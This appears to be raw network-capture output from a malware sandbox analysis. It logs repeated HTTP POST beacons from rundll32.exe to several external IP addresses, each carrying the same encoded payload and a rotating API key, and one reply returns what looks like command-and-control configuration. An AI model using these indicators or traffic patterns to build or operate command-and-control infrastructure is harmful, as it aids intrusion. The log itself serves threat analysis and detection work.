Jul 15, 2024 12:52:17.741628885 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: uoODSQ5Q Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 15, 2024 12:52:18.350729942 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Mon, 15 Jul 2024 10:52:18 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	49755	195.2.70.38	80	6516	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:52:18.608309031 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: MrJxAEK9 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	49756	91.142.74.28	80	6516	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:52:20.361051083 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: CKG9Esl2 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	49757	77.238.224.56	80	6516	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:52:22.400051117 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: DP3CY4a4 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	49758	77.238.229.63	80	6516	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:52:24.002881050 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: mtIZ0YXy Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	49759	77.238.250.123	80	6516	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:52:25.649348974 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: ZslkkrvB Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 15, 2024 12:52:26.279187918 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Mon, 15 Jul 2024 10:52:26 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	49760	195.2.70.38	80	6580	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:52:47.429224968 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: HSGVVxiM Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	49761	195.2.70.38	80	1216	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:52:48.358725071 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: higpnnJi Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	49762	91.142.74.28	80	6580	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:52:49.186743021 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 3Xrnh7bV Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	49763	91.142.74.28	80	1216	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:52:50.108691931 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: ea4Tiyie Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	49764	77.238.224.56	80	6580	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:52:50.920933962 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: NGKv3Ksp Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	49765	77.238.224.56	80	1216	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:52:51.852854013 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: rX9IcSF1 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	49766	77.238.229.63	80	6580	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:52:52.571376085 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: GqPmqxNR Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	49767	77.238.229.63	80	1216	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:52:53.491560936 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: EgXclkc4 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	49768	77.238.250.123	80	6580	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:52:54.197122097 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: mXuQb0Xk Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 15, 2024 12:52:55.587429047 CEST	548	IN	HTTP/1.1 200 OK Date: Mon, 15 Jul 2024 10:52:55 GMT Content-Length: 430 Content-Type: text/plain; charset=utf-8 Data Raw: 31 38 35 2e 32 33 31 2e 31 35 35 2e 32 33 34 3b 32 30 35 32 39 3b 68 41 30 56 74 73 4a 6a 74 31 6d 77 70 38 75 4b 3a 57 37 65 2f 50 30 6e 2f 30 79 54 31 46 41 4f 39 6d 53 30 35 68 58 31 2e 49 35 5a 32 38 33 34 2e 59 4a 4b 37 56 46 31 30 65 62 49 2e 46 55 4f 33 5a 47 75 38 46 77 5a 2c 47 32 58 68 33 36 4f 74 71 76 54 74 6d 4e 75 70 42 52 32 3a 46 55 44 2f 56 5a 55 2f 31 38 71 39 6b 69 64 31 57 6c 55 2e 44 6b 68 31 73 79 36 34 74 4e 65 32 4e 39 44 2e 6a 74 33 37 4e 59 74 34 36 54 63 2e 30 75 73 32 4c 37 6a 38 4d 34 6e 2c 66 63 34 68 35 58 45 74 4d 4a 42 74 58 72 4f 70 58 73 76 3a 31 74 4f 2f 50 30 48 2f 4f 66 61 37 6a 6d 57 37 62 55 77 2e 42 5a 32 32 45 49 51 33 6a 50 53 38 45 37 33 2e 32 77 37 32 47 54 55 32 54 59 62 34 4e 4a 42 2e 6a 71 52 35 6c 67 44 36 6b 58 35 2c 46 78 74 68 52 45 45 74 37 37 6b 74 35 6c 56 70 6a 6d 65 3a 7a 43 30 2f 6a 51 6a 2f 44 61 5a 37 4b 6e 69 37 4a 41 6a 2e 32 61 47 32 63 42 4e 33 32 41 50 38 70 6e 52 2e 4f 58 35 32 4d 72 62 32 72 58 6b 39 6d 6a 6d 2e 35 7a 59 36 62 78 57 [TRUNCATED] Data Ascii: 185.231.155.234;20529;hA0VtsJjt1mwp8uK:W7e/P0n/0yT1FAO9mS05hX1.I5Z2834.YJK7VF10ebI.FUO3ZGu8FwZ,G2Xh36OtqvTtmNupBR2:FUD/VZU/18q9kid1WlU.Dkh1sy64tNe2N9D.jt37NYt46Tc.0us2L7j8M4n,fc4h5XEtMJBtXrOpXsv:1tO/P0H/Ofa7jmW7bUw.BZ22EIQ3jPS8E73.2w72GTU2TYb4NJB.jqR5lgD6kX5,FxthREEt77kt5lVpjme:zC0/jQj/DaZ7Kni7JAj.2aG2cBN32AP8pnR.OX52Mrb2rXk9mjm.5zY6bxW3fx0,iyRhpIGtuidttiCpaby:2Jb/IFE/vyq79t57dYp.wLP23QM3Tlc8CSP.3zy2zjG535H0vwC.JtX1R8p2jn03uCR
Jul 15, 2024 12:53:25.594650030 CEST	6	OUT	Data Raw: 00 Data Ascii:
Jul 15, 2024 12:53:55.603470087 CEST	6	OUT	Data Raw: 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	49769	77.238.250.123	80	1216	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:52:55.114023924 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 9PtS8V5T Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 15, 2024 12:52:55.710138083 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Mon, 15 Jul 2024 10:52:55 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	49771	195.2.70.38	80	6516	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:52:56.283332109 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: NmInWh8x Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	49772	91.142.74.28	80	6516	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:52:58.038038015 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: Rw0gBNX8 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	49773	77.238.224.56	80	6516	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:52:59.764374018 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 0lFI41j9 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
